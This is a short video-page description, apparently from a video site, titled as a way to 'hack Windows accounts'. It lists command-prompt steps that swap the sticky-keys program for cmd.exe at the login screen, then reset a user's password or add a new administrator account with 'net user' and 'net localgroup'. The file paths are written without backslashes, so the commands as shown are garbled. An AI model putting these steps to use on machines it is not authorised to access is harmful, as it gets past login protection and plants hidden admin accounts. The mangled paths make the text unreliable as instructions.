watermark logo

How to: hack Windows accounts or change pc administrator passwords using command prompt.

363 Views
Admin
Admin
20 May 2016

In this video I will explain how to remove Windows passwords or access an account without removing a password, using only the command prompt, by using a bootable command prompt to replace the sticky keys function with a command prompt and then using the net user command to remove the password.

Please Like and Subscribe.

Commands

-Replacing sticky keys-

diskpart

list vol

exit

copy c:windowssystem32sethc.exe c:

copy c:windowssystem32cmd.exe

c:windowssystem32sethc.exe

exit

-Destructive method.-

net user (username) *

-Non Destructive method-

net user (username) /add

net localgroup administrators (username) /add

Show more

0 Comments Sort By

No comments found

Up next